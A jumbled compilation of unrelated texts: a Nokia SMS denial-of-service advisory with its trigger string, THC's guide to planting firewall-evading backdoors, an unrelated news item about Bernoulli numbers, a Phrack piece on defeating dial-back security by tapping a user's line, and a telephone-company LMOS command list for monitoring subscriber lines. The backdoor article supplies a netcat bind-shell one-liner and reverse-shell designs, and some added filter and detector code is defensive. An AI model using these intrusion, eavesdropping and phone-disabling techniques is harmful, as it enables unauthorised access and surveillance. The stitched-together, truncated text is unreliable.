Attacking Nokia

Affected Products
=================

All Nokia Series60 2.6, 2.8, 3.0, 3.1 devices, see detailed list at
the end of the document.


Requirements to Execute Attack
==============================

- MSISDN of the target
- mobile phone contract that allows sending of SMS messages
- (almost) any Nokia phone (or some other means of sending SMS
messages with TP-PID set to "Internet Electronic Mail")


Risk Level
==========

Medium (for S60 2.8 and 3.1 devices): Target will not be able to
receive any SMS or MMS messages while the attack is ongoing. After
that, only very limited message receiving is possible until the device
is factory reset.

High (for S60 2.6 and 3.0 devices): Target will not be able to receive
any SMS or MMS messages until the device is factory reset.


Summary
=======

Emails can be sent via SMS by setting the message's Protocol Identifier
to "Internet Electronic Mail" and formatting the message like this:



If such messages contain an email address with more than 32
characters, S60 2.6, 2.8, 3.0 and 3.1 devices are not able to receive
other SMS or MMS messages anymore. 2.6 and 3.0 devices lock up after
only one message, 2.8 and 3.1 devices after 11 messages.


Details
=======

3GPP TS 23.040 specifies a method for sending emails via SMS in
section 3.8 ("SMS and Internet Electronic Mail interworking"). In its
most basic form, such an SMS message starts with the from- (MT-SMS) or
to-email-address (MO-SMS), followed by a space character, and then the
message body. The TP-Protocol-Identifier of the SMS message has to be
set to "Internet Electronic Mail" (value: 50 / 0x32).

It is not specified how such a message should be displayed when
received by the phone. Before S60 2.6, Series60 devices displayed such
messages exactly as they were sent. Starting with S60 2.6, when the
part of the message that should contain the from-address looks
anything like an email address (i.e. it contains an "@" somewhere),
this address is then displayed as the message sender instead of the
usually shown TP-Originating-Address.

If this email address is longer than 32 characters, Series60 2.6, 2.8,
3.0 and 3.1 devices fail to display the message or give any indication
on the user interface that such a message has been received. They do,
however, signal to the SMSC that they received the message by sending
an RP-ACK.

Devices running S60 2.6 or 3.0 will not be able to receive any other
SMS message after that. The user interface does not give any
indication of this situation. The only action to remedy this situation
seems to be a Factory Reset of the device (by entering "*#7370#").

Devices running S60 2.8 or 3.1 react a little differently: They do not
lock up until they have received at least 11 SMS-email messages with an
email address that is longer than 32 characters. The device will not
be able to receive any other SMS message after that - upon receiving
the next message, the phone will just display a warning that there is
not enough memory to receive further messages and that data should be
deleted first. This message is even displayed on an otherwise
completely "empty" device.

After switching the phone off and on again, it has limited capability
for receiving SMS messages again: If it receives an SMS message that is
split up into several parts (3GPP TS 23.040, 9.2.3.24.1 Concatenated
Short Messages) it is only able to receive the first part and will
display the "not enough memory" warning again. After power-cycling the
device again, it can then receive the second part. If there is a third
part, it has to be power-cycled again, and so on.

Also, an attacker now just needs to send one more "Curse Of Silence"
message to lock the phone up again. By always sending yet another one
as soon as the status report for delivery of the previous message is
received, the attacker could completely prevent a target from
receiving any other SMS/MMS messages.

Only factory resetting the device will restore its full message
receiving capabilities. Note that, if a backup is made using Nokia
PC-Suite *after* being attacked, the blocking messages are also
backed up and will be sent to the device again when restoring the
backup after the factory reset.

Note that not being able to receive SMS messages also means not being
able to receive MMS messages, since they are signalled by sending an
SMS message to the device.

"Curse Of Silence" messages can be generated with any phone or
cellular modem that supports 3GPP TS 27.005 AT commands and with most
Nokia phones also directly from the user interface. For example, on
S60 devices, when in the message editor, the type of the message can
be switched to "E-mail" under "Options" -> "Sending options" ->
"Message sent as". The 6310i conveniently offers a "Write email" menu
entry in the messaging menu.

The simplest form of content for a Curse Of Silence would be something
like "123456789@123456789.1234567890123 " (the digits are used only to
illustrate the length of the "email address" of more than 32
characters). Note the space at the end of the message!


Workaround
==========

None known for the user side.

Until a firmware fix is available, network operators should filter
messages with TP-PID "Internet Electronic Mail" and an email address
of more than 32 characters or reset the TP-PID of these messages to 0.
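The following is an added example (not part of the advisory, and not Nokia's or any operator's code) of the operator-side filter the workaround describes. It assumes a message is handed to it as a dict holding the TP-PID value and the already decoded user data (7-bit/UCS-2 decoding is outside this example); the "email address" is taken, as 3GPP TS 23.040 section 3.8 describes for the basic form, to be everything before the first space, and, following the Details section, it only counts as an address when it contains an "@".

```python
from typing import Optional

# TP-PID values used here. 0x32 is "Internet Electronic Mail" from the
# advisory; 0x00 is the default PID the workaround proposes to reset to.
PID_INTERNET_EMAIL = 0x32
PID_DEFAULT = 0x00
# Threshold from the advisory: addresses longer than 32 characters trigger the bug.
MAX_SAFE_ADDRESS_LEN = 32


def extract_email_address(user_data: str) -> Optional[str]:
    """Return the from/to address of an SMS-email, or None if the user data
    does not have the basic form "<address><space><body>" with an '@' in the
    address part."""
    head, sep, _body = user_data.partition(" ")
    if not sep or "@" not in head:
        return None
    return head


def is_curse_of_silence(pid: int, user_data: str) -> bool:
    """True when TP-PID is Internet Electronic Mail and the address part is
    longer than the safe limit."""
    if pid != PID_INTERNET_EMAIL:
        return False
    addr = extract_email_address(user_data)
    return addr is not None and len(addr) > MAX_SAFE_ADDRESS_LEN


def filter_message(msg: dict, mode: str = "reset") -> Optional[dict]:
    """Apply the workaround to one message. mode="reset" clears TP-PID to 0
    so the handset treats the text as an ordinary SMS; mode="drop" discards
    the message entirely. Harmless messages are returned unchanged."""
    if not is_curse_of_silence(msg["pid"], msg["user_data"]):
        return msg
    if mode == "drop":
        return None
    fixed = dict(msg)
    fixed["pid"] = PID_DEFAULT
    return fixed


if __name__ == "__main__":
    # Constructed sample: the advisory's illustrative 33-character "address"
    # followed by the trailing space it points out.
    sample = {"pid": PID_INTERNET_EMAIL,
              "user_data": "123456789@123456789.1234567890123 "}
    print(filter_message(sample))
    print(filter_message(sample, mode="drop"))
```

Resetting the PID keeps the message deliverable (the recipient sees the raw text, as pre-2.6 devices always did) while removing the trigger; dropping is the blunter option. Either way the check must sit in front of the SMSC delivery path, since the vulnerable handset acknowledges the message with RP-ACK and gives the user no indication.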


Credits
=======

Tobias Engel
November 9, 2008

Many thanks to Frank Rieger for spending countless hours cutting and
editing the video.


Detailed List of Affected Products
==================================

Tested on several S60 2.6, 3.0 and 3.1 devices. Since the vulnerable
component is an S60 base functionality, it seems safe to assume that
all devices with these OS versions are affected.

S60 3rd Edition, Feature Pack 1 (S60 3.1):
Nokia E90 Communicator
Nokia E71
Nokia E66
Nokia E

Placing Backdoors Through Firewalls

Introduction

This article describes possible backdoors through different firewall architectures. However, the material can also be applied to other environments to describe how hackers (you?) cover their access to a system.

Hackers often want to retain access to systems they have penetrated even in the face of obstacles such as new firewalls and patched vulnerabilities. To accomplish this the attackers must install a backdoor which a) does its job and b) is not easily detectable. The kind of backdoor needed depends on the firewall architecture used.

As a gimmick and proof-of-concept, a nice backdoor for any kind of intrusion is included, so have fun.




----[ Firewall Architectures

There are two basic firewall architectures and each has an enhanced version.

Packet Filters:

This is a host or router which checks each packet against an allow/deny ruletable before routing it through the correct interface. There are very simple ones which can only filter from the origin host, destination host and destination port, as well as good ones which can also decide based on incoming interface, source port, day/time and some tcp or ip flags.
This could be a simple router, f.e. any Cisco, or a Linux machine with firewalling activated (ipfwadm).

Stateful Filters:

This is the enhanced version of a packet filter. It still does the same checking against a rule table and only routes if permitted, but it also keeps track of state information such as TCP sequence numbers. Some pay attention to application protocols which allows tricks such as only opening ports to the interior network for ftp-data channels which were specified in a permitted ftp session. These filters can (more or less) get UDP packets (f.e. for DNS and RPC) securely through the firewall. (That's because UDP is a stateless protocol. And it's more difficult for RPC services.)
This could be a great OpenBSD machine with the ip-filter software, a Cisco Pix, Watchguard, or the (in)famous Checkpoint FW-1.

Proxies / Circuit Level Gateways:

A proxy as a firewall host is simply any server which has no routing activated and instead has proxy software installed.
Examples of proxy servers which may be used are squid for WWW, a sendmail relay configuration and/or just a sockd.

Application Gateways:

This is the enhanced version of a proxy. Like a proxy, for every application which should get through the firewall a piece of software must be installed and running to proxy it. However, the application gateway is smart and checks every request and answer, f.e. that an outgoing ftp may only download data but not upload any, and that the data has got no virus, no buffer overflows are generated in answers etc. One can argue that squid is an application gateway, because it does many sanity checks and lets you filter stuff, but it was not programmed for installation in a secure environment and still has/had security bugs.
A good example for a freeware kit for this kind is the TIS firewall toolkit (fwtk).

Most firewalls that vendors sell on the market are hybrid firewalls, which means they've got more than just one type implemented; for example the IBM Firewall is a simple packet filter with socks and a few proxies. I won't discuss which firewall product is the best, because this is not a how-to-buy-a-firewall paper, but I will say this: application gateways are by far the most secure firewalls, although money, speed, special protocols, open network policies, stupidity, marketing hype and bad management might rule them out.


----[ Getting in

Before we talk about which backdoors are the best for which firewall architecture we should shed some light on how to get through a firewall the first time. Note that getting through a firewall is not a plug-n-play thing for script-kiddies, this has to be carefully planned and done.

The four main possibilities:

Insider:

There's someone inside the company (you, girl/boy-friend, chummer) who installs the backdoor. This is the easiest way of course.

Vulnerable Services:

Nearly all networks offer some kind of services, such as incoming email, WWW, or DNS. These may be on the firewall host itself, a host in the DMZ (here: the zone in front of the firewall, often not protected by a firewall) or on an internal machine. If an attacker can find a hole in one of those services, he's got good chances to get in. You'd laugh if you'd see how many "firewalls" run sendmail for mail relaying ...

Vulnerable External Server:

People behind a firewall sometimes work on external machines. If an attacker can hack these, he can cause serious mischief such as the many X attacks if the victim uses it via an X-relay or sshd. The attacker could also send fake ftp answers to overflow a buffer in the ftp client software, replace a gif picture on a web server with one which crashes netscape and executes a command (I never checked if this actually works, it crashes, yeah, but I didn't look through this to see if it is really an exploitable overflow). There are many possibilities with this but it needs some knowledge about the company. However, an external web server of the company is usually a good start. Some firewalls are configured to allow incoming telnet from some machines, so anyone can sniff these and get in. This is particularly true for the US, where academic environments and industry/military work close together.

Hijacking Connections:

Many companies think that if they allow incoming telnet with some kind of secure authentication like SecureID (secure algo?, he) they are safe. Anyone can hijack these after the authentication and get in ... Another way of using hijacked connections is to modify replies in the protocol implementation to generate a buffer overflow (f.e. with X).

Trojans:

Many things can be done with a trojan horse. This could be a gzip file which generates a buffer overflow (well, needs an old gzip to be installed), a tar file which tampers with f.e. ~/.logout to execute something, or an executable or source code which was modified to get the hacker in somehow. To get someone to run this, mail spoofing could be used or replacing originals on an external server which internal employees access to update their software regularly (ftp xfer files and www logs can be checked to find out which files these are).




----[ Placing the Backdoors

An intelligent hacker will not try to put the backdoors on machines in the firewall segment, because these machines are usually monitored and checked regularly. It's the internal machines which are usually unprotected and without much administration and security checks.

I will now talk about some ideas of backdoors which could be implemented. Note that programs which will/would run on a stateful filter will of course work with a normal packet filter too, same for the proxy. Ideas for an application gateway backdoor will work for any architecture.
Some of them are "active" and others "passive". "Active" backdoors are those which can be used by a hacker anytime he wishes, a "passive" one triggers itself by time/event so an attacker has to wait for this to happen.

Packet Filters:

It's hard to find a backdoor which gets through this one but does not work for any other. The few ones which come to my mind are:

a) the ack-telnet. It works like a normal telnet/telnetd except it does not work with the normal tcp handshake/protocol but uses TCP ACK packets only. Because they look like they belong to an already established (and allowed) connection, they are permitted. This can be easily coded with the spoofit.h of Coder's Spoofit project (http://reptile.rug.ac.be/~coder).

b) Loki from Phrack 49/51 could be used too to establish a tunnel with icmp echo/reply packets. But some coding would need to be done.

c) daemonshell-udp is a backdoor shell via UDP (http://www.thc.org look for thc-uht1.tgz)

d) Last but not least, most "firewall systems" with only a screening router/firewall let any incoming tcp connection from the source port 20 to a highport (>1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one.

Stateful Filters:

Here a hacker must use programs which initiate the connection from the secure network to his external 0wned server. There are many out there which could be used:

active:
tunnel from Phrack 52.
ssh with the -R option (much better than tunnel ... it's a legitimate program on a computer and it encrypts the datastream).

passive:
netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org).
reverse_shell from the thc-uht1.tgz package (see above) does the same.

Proxies / Circuit Level Gateways:
If socks is used on the firewall, someone can use all the stuff for the stateful filter and "socksify" it. (www.socks.nec.com) For more advanced tools you should take a look at the application gateway section.

Application Gateways:
Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed.

active:
(re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/checked/audited and accessible from the internet. I hope nobody needs an example of such a thing ;-)
(re-)placing a service/binary on the firewall. This is dangerous because those are audited regularly and sometimes even sniffed permanently ...
Loading a loadable module into the firewall kernel which hides itself and gives access to its master. The best solution for an active backdoor but still dangerous.

passive:
E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed.
WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in reality the answers to commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell)
DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example still needs much coding to be effective)




----[ Backdoor Example: The Reverse WWW Shell

This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company.
For a better understanding take a look at the following picture and try to remember it onwards in the text:

+--------+                    +------------+              +-------------+
|internal|--------------------|  FIREWALL  |--------------|server owned |
|  host  |  internal network  +------------+   internet   |by the hacker|
+--------+                                                +-------------+
  SLAVE                                                       MASTER

Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends its ready signal. The legitimate looking answers of the www server owned by the hacker are in reality the commands the child will execute on its machine in the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) into a Base64 like structure and given as a value for a cgi-string to prevent caching.

Example of a connection:

Slave
GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0

Master replies with
g5mAlfbknz

The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks:

The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; the program masks its name in the process listing ...

Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect.

Well, why code it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl installed, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one.

The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://www.thc.org for updates.


----[ The Source

Grab it here ...

rwwwshell v2.0


----[ Security

Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. Email should be put on a centralized mail server, DNS resolving only done on the WWW/FTP proxies, and access to WWW only after proxy authentication. However, this is not enough. An attacker can tamper with the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication in the reverse www-shell (it's simple). Also, checking the DNS and WWW logs/caches regularly with good tools can be defeated by switching the external servers every 3-20 calls or using aliases.

A secure solution would be to set up a second network which is connected to the internet, and keep the real one separated - but try telling that to the employees ... A good firewall is a big improvement, and Intrusion Detection Systems can also help. But nothing can stop a dedicated attacker.
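As an added illustration of the log-checking the Security section talks about (this is my own example, not part of the original article and not related to the rwwwshell code itself), here is a small detector that runs over proxy access logs and looks for the traffic shape the Reverse WWW Shell produces: repeated GETs from one client to one URL path whose entire query string is a single opaque, never-repeating, high-entropy token rather than key=value pairs. The log lines are constructed samples in squid's native access.log layout with documentation-range addresses; the thresholds are assumptions to tune per environment.

```python
import math
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample lines (not real logs) in squid native access.log format:
# timestamp elapsed client action/code size method URL ident hierarchy type
# The first four mimic a daily-beaconing slave; the rest are ordinary browsing.
SAMPLE_LOG = """\
1226227200.000    120 10.0.0.5 TCP_MISS/200 312 GET http://198.51.100.7/cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj - DIRECT/198.51.100.7 text/html
1226227203.000     98 10.0.0.5 TCP_MISS/200 301 GET http://198.51.100.7/cgi-bin/order?g5mAlfbknzQ2c1KpLm9xRtUvWy3Za7BdEfGhJkNpQs - DIRECT/198.51.100.7 text/html
1226227206.000    101 10.0.0.5 TCP_MISS/200 298 GET http://198.51.100.7/cgi-bin/order?Zq8LmN2vXc4BnM1kJh7GfD5sA3pOiUyTrEwQ9aZx - DIRECT/198.51.100.7 text/html
1226227209.000    105 10.0.0.5 TCP_MISS/200 305 GET http://198.51.100.7/cgi-bin/order?Hf3Jk9LmPq2RsT5VwX7YzA1BcD4EgF6HiJ8KlM0N - DIRECT/198.51.100.7 text/html
1226227210.000     50 10.0.0.9 TCP_HIT/200 5120 GET http://www.example.com/index.html - NONE/- text/html
1226227211.000     60 10.0.0.9 TCP_MISS/200 820 GET http://www.example.com/search?q=firewall+policy - DIRECT/192.0.2.10 text/html
1226227212.000     60 10.0.0.9 TCP_MISS/200 820 GET http://www.example.com/search?q=proxy+auth - DIRECT/192.0.2.10 text/html
"""

# Only the fields the heuristic needs: timestamp, client, method, URL.
LINE_RE = re.compile(
    r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded command/prompt blobs score far higher than
    natural-language query values."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line: str):
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def find_beacons(log_text: str, min_requests: int = 3, min_len: int = 24,
                 min_entropy: float = 3.5, group_by_host: bool = True):
    """Return one alert per (client, host, path) whose GETs all carry a
    distinct opaque query token. With group_by_host=False the host is ignored,
    which is the grouping needed when the operator rotates external servers
    every few calls, as the text above anticipates."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "GET":
            continue
        u = urlsplit(rec["url"])
        q = u.query
        # rwwwshell pattern: the whole query is one token, not key=value pairs.
        if not q or "=" in q or "&" in q:
            continue
        if len(q) < min_len or shannon_entropy(q) < min_entropy:
            continue
        host = u.hostname if group_by_host else "*"
        groups[(rec["client"], host, u.path)].append(q)

    alerts = []
    for (client, host, path), tokens in groups.items():
        # Enough requests, and the cache-busting token never repeats.
        if len(tokens) >= min_requests and len(set(tokens)) == len(tokens):
            alerts.append({"client": client, "host": host, "path": path,
                           "requests": len(tokens)})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(SAMPLE_LOG):
        print(alert)
```

The heuristic is deliberately structural rather than signature based: it does not depend on the path name or the encoding alphabet, only on the fact that every request must carry fresh opaque data to defeat caching. That also makes the trade-off explicit: legitimate sites that put session tokens in the query string will trip it, so the alert is a lead for an analyst to correlate with the daily timing the text describes, not a block rule.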

----[ Last Words

Have fun hacking/securing the systems ...
Greets to all guys who like + know me ;-) and especially to those good
chummers I've got, you know who you are.

Ciao...
van Hauser / [THC] - The Hacker's Choice


For further interesting discussions you can email me at
vh@reptile.rug.ac.be with my public pgp key below:

Type Bits/KeyID Date User ID
pub 2048/CDD6A571 1998/04/27 van Hauser / THC


----[ THE END

Iraqi kid solves a maths problem unsolved for 300 years

STOCKHOLM (AFP) – A 16-year-old Iraqi immigrant living in Sweden has cracked a maths puzzle that has stumped experts for more than 300 years, Swedish media reported on Thursday.
In just four months, Mohamed Altoumaimi has found a formula to explain and simplify the so-called Bernoulli numbers, a sequence of calculations named after the 17th century Swiss mathematician Jacob Bernoulli, the Dagens Nyheter daily said.
Altoumaimi, who came to Sweden six years ago, said teachers at his high school in Falun, central Sweden were not convinced about his work at first.
"When I first showed it to my teachers, none of them thought the formula I had written down really worked," Altoumaimi told the Falu Kuriren newspaper.
He then got in touch with professors at Uppsala University, one of Sweden's top institutions, to ask them to check his work.
After going through his notebooks, the professors found his work was indeed correct and offered him a place in Uppsala.
But for now, Altoumaimi is focusing on his school studies and plans to take summer classes in advanced mathematics and physics this year.
"I wanted to be a researcher in physics or mathematics; I really like those subjects. But I have to improve in English and social sciences," he told the Falu Kuriren.

Hacking SAM - A Description Of The Dial-Up Security System

(314)432-0756
24 Hours A Day, 300/1200 Baud

Presents...

==Phrack Inc.==
Volume One, Issue One, Phile 2 of 8

::>Hacking SAM - A Description Of The Dial-Up Security System<::
::>Written by Spitfire Hacker<::

SAM is a security system that is being used in many colleges
today as a security feature against intrusion from the outside. This
system utilizes a dial-back routine which is very effective. To
access the computer, you must first dial the port to which SAM is
hooked up. The port for one such college is located at (818) 885-
2082. After you have called, SAM will answer the phone, but will make
no other responses (no carrier signals). At this point, you must
punch in a valid Login Identification Number on a push-button phone.
The number is in this format -- xxyyyy -- where xx is, for the number
mentioned above, 70. 'yyyy' is the last 4 digits of the valid user's
telephone number.
If a valid LIN is entered, SAM will give one of 3 responses:
1) A 1 second low tone
2) A 1 second alternating high/low tone
3) A tone burst

Responses 1 and 2 indicate that SAM has accepted your passcode and is
waiting for you to hang up. After you hang up, it will dial the valid
user's phone number and wait for a second signal.

Response 3 indicates that all of the outgoing lines are busy.

If SAM accepts your passcode, you will have to tap into the valid
user's line and intercept SAM when it calls. If you do this, then hit
the '*' key on your phone. SAM will respond with a standard carrier,
and you are in!

That's all that I have hacked out so far, I will write more
information on the subject later.

Spitfire Hacker
2600 Club!

==Phrack Inc.==

                     Volume Two, Issue 18, Phile #8 of 11

Control C

and

The Tribunal of Knowledge presents...

LMOS (Loop Maintenance Operation System)

-A List of Commands-

This file contains what to our knowledge are the best things to do on
LMOS. We were really vague due to the great power of the information provided
in this file. You now know the commands so we will not go into (either in
this file or when talking to us) how to use this information, it is up to you
to figure out how to use it.

+: Increase the voice volume on a line

+ lets you increase the volume when you are talking on or monitoring a
subscriber's line over a callback path. The volume is increased because MLT
adds amplifier to the line. + may be used after a mon, talk, rev, talkin or
call request. Sometimes MLT adds an amplifier automatically to a long line.
You will not know it is there, so if you try to add amplification, a + will
appear in the status sections but the voices will not get any louder because
they are already as loud as possible.

-: Decrease the voice volume on a line

- lets you decrease the volume when you are talking on or monitoring a
subscriber's line over a callback path. The volume is decreased because MLT
removes amplifier from the line. - may be used to remove amplifier that you
have placed on the line with the + request, or amplifier that MLT has
automatically placed on a long line. The main reason to remove the amplifier
is because it can sometimes cause a shrill or howl.

Call: Make a call on a subscriber's line

Call lets you use your touch-tone pad to dial any number you want using the
customer's line circuit. It does this by simulating an off-hook condition in
order to draw dial tone. A callback number is a required entry on the tv mask
and an mdf access is required for calling out (except in SXS and panel
offices). You can use a call when: 1) You want to know the TN for a known CA
& PR - you would call TSPS or ANI. 2) Calls cannot be completed to a TN - you
would call that TN. 3) To monitor dial tone on a customer's line.

Callrd: Make a call on a dial pulse line circuit

Callrd lets you use your touch-tone pad to dial using the customer's rotary
dial line circuit. MLT does this by translating tones on a customer's line.
mdf access is required for calling out (except in SXS, DMS10, DMS100, and
DMS100AC offices). Use a callrd if you want to know the TN for a known CA &
PR - you would call TSPS or ANI.

Ccol: Collect coins using coin relay

Ccol attempts to collect any coins that are in the hopper of a coin telephone
set by operating the coin relay. Ccol does not check the totalizer or check
the rest of the line. The results tell you only about relay operation, speed,
and the current that is necessary to operate it. A ver code is not returned
by ccol. You must have access to the line before you request ccol. You will
use ccol most often when you are talking to a repair person who is trying to
fix a coin phone.

Channel: Run enhanced channel tests on DLC lines

Chan or channel runs channel isolation tests and tells you if you have a bad
COT or RT channel unit. Use this request to run enhanced channel tests on
lines served by digital loop carriers such as SLC Series 5. Chan can only be
run if there is special equipment in the co you're testing in. If you are
testing a non-locally switched line with the SSA request, channel tests must
be run separately with this request. Chan may also be used to run channel
isolation tests on switched lines from the tv or stv mask, but these tests are
included when you do a full or loop on a switched line.

Change: Change status information

Change allows you to change cable, pair or comment information that is
displayed without having to request a test or any other type of information.
The permanent line record information is not changed. To request a change,
enter "change" in the req field of the tv and enter the changed information.

Chome: Home totalizer on a coin telephone

Chome attempts to return a totalizer to the starting position (home) for
counting coins. The totalizer counts the coins and sends a tone back to the
co for every 5 cents deposited. If it is not homed, coins can't be deposited.
A chome request tells you whether the totalizer was homed, how many tones were
sent to the co, and the current that was used to home the totalizer. A line
must already be accessed to request a chome. Chome is often used when a
repair person is trying to fix a coin telephone.

Co: Test the central office equipment

Co initiates a series of tests on the subscriber's line circuit. Co can be
requested using either a no-test or an MDF trunk. A no-test access connects
you to the entire loop but a co request tests only the inside portion. An MDF
access is only connected to the inside portion of the loop. The outside
portion is physically disconnected. Use a no-test access when you are fairly
sure the trouble is inside the central office. Use a co on an MDF access when
you are not sure where the trouble is.

Coin: Test a coin telephone set

Coin initiates a full series of tests on a telephone line. The station set,
the totalizer, the coin relay, the loop and the co equipment are checked. If
the coin request finds something wrong with either the totalizer or the relay,
it stops testing and tells you the trouble is in the set. If it finds nothing
wrong, it runs the full series of tests. Coin may be used when a repair
person is trying to fix a coin telephone. If a coin phone is newly installed,
coin will check the set even though there is no line record.

Cret: Operate coin relay to return coins

Cret attempts to return any coins that may be lodged in the hopper of a coin
telephone set. It operates the coin relay so that it will return the coins.
It tries to return them 3 times before giving up. If it is successful, it
also checks the speed of the relay. It does not check the totalizer or the
rest of the line. You should have access to the line before you request a
cret. You will use cret primarily when you are talking to a repair person who
is trying to repair a coin telephone.

Cset: Check totalizer and relay in coinset

Cset checks the totalizer and the coin relay in a coin telephone set. The
totalizer is the mechanism in the phone that counts deposited coins and sends
a tone back to the co for every 5 cents that is deposited. The relay is the
mechanism that either returns or collects the coins that are deposited. Cset
does not check the co or loop parts of the line. Cset can be used when you
are talking to a repair person who is fixing a coin telephone.

Dial: Test a subscriber's rotary dial

Dial checks the subscriber's rotary dial. You must be in contact with the
subscriber, either over a callback path or over a ddd line. For the dial
request to work correctly, tell the subscriber to dial a "0" after hearing
brief dial tone. The results of a dial request tell you whether the dial is
okay or not, whether the dial speed is okay and what the speed is, and whether
the break is okay and what the break is. Use the dial request when you
suspect a problem with the telephone set. The trouble report could be "Can't
call out" or "Gets wrong numbers", for example.

Dtout: Test a pbx line circuit

Dtout initiates a series of tests on a pbx line circuit. Dtout must be
requested using an MDF trunk. It is used to draw dial tone and check the
arrangement of the pbx line circuit. Use dtout when you need to check the
condition of special service circuits that do not use central office switches.

Full: Test the entire telephone line

Full starts a series of tests that do an extensive analysis of the entire
line. This includes both the inside and outside portions. Many individual
tests are run and the most important results are displayed in the summary
message. Outside, MLT checks for AC and DC faults. Inside, it checks the line
circuit and dial tone. The results may also include many other types of
information about the line. You might request a full line test when you first
access a line or when you need to know a lot about a line.

Grm: Get fast ground resistance measurement

Grm gives you a quick measurement of the DC resistance of the ground path from
the strap to the test hardware. Before you do a grm, have the repair person
strap the tip and ring wires to ground. If this isn't done, grm will give you
incorrect values. The line must be accessed before you do a grm request. You
can use grm when you are talking to a repair person who is fixing a coinset.
The resistance values obtained from a grm can be compared to old resistance
values that are stored inside each coinset.

Help: List the valid tv requests

Help returns a list of all of the valid requests used in MLT-2. Help can be
used when you are not sure which request to use in a particular situation, or
when you can't remember an exact request name. For example, the correct entry
to reverse polarity on a touch-tone line is "rev"; help will tell you this.
For a description of any specific request, enter the name of the request
followed by a question mark.

Info: Get general information about a line

Info gives you the wire center name and the location of the frame; the
exchange key, MDF group and MDF trunk numbers associated with the subscriber's
line; the telephone number at the appropriate frame; and the assignment
telephone number. You can get information about a whole telephone number, an
NPA-NXX-, or an exchange key. MLT does not access the line when you request
info, but it keeps access if you already have it. If there are multiple
frames in an office, MLT gives you information about all of them.

Keep: Keep an access that you already have

Keep lets you hold access to a no-test or MDF trunk that is about to
"timeout." MLT keeps track of which trunks you have accessed but have not
used for a while. MLT will automatically drop the access for you after a
certain period of time. About 2 minutes before dropping the access, MLT gives
you a warning message and also highlights the status line that will be
dropped. If you want to keep the access, you should enter "keep" in the req
field and the tn or line number of the access to be held. To drop an access
when you are finished with it, enter an x in the req field.

Lin: Test the inside part of the loop

Lin starts a series of tests on the inside portion of a line. Lin includes
the same tests as the loop test and can identify a co line circuit if one is
present. Lin does not do the regular line circuit and draw and break dial
tone tests. An MDF access is required for a lin request. You can use lin to
test special circuits that do not use a co switching machine. For example, if
the circuit has 2 loops connected at the frame, lin lets you look at the
second loop (both full and loop only test toward one loop).

Lloop: Run the long loop analysis on the outside or loop part of a line

The lloop request starts a series of tests which do extensive analysis of the
outside portion of the subscriber's line. It is specifically designed to
handle cases that the regular loop request was not designed to handle. These
cases include very long loops (over 100,000 feet) and multiparty lines on
moderate-to-very-long loops. It does similar measurements to those that loop
does, but analyzes the results differently. It expects to see a loop that has
no dc faults or only very light dc faults. If you use lloop on a loop that
has serious dc faults it will not do the long loop analysis.

Loc1: Measure distance to 1-sided resistive fault

Loc1 gets MLT to measure how far a one-sided fault is from the repair person.
Because telephone lines can be very long, it can be difficult for a repair
person to find the location of a resistive fault. You can use loc1 to help
the repair person locate a 1-sided fault. You should be in contact with the
repair person on a line other than the one being measured. Have the repair
person open the pr at a ready-access point beyond the fault if possible. Ask
him/her to strap the pr tip to ring. Remember to enter a temperature on the
tv mask before you transmit the loc1 request.

Loc2: Measure distance to 2-sided resistive fault

Loc2 gets MLT to measure how far a two-sided fault is from the repair person.
Remember that you must run a locgp before you run a loc2 and that you must be
in contact with the repair-person on a line other than the one you will be
measuring. The repair-person must connect the bad pair to the good pair in a
specific way, the exact method to use is explained in the results of the locgp
request. Locgp and loc2 can also be used to sectionalize a one-sided
resistive fault. Remember to enter a temperature on the tv mask before you
transmit the loc2 request.

Look: Look for an intentional fault

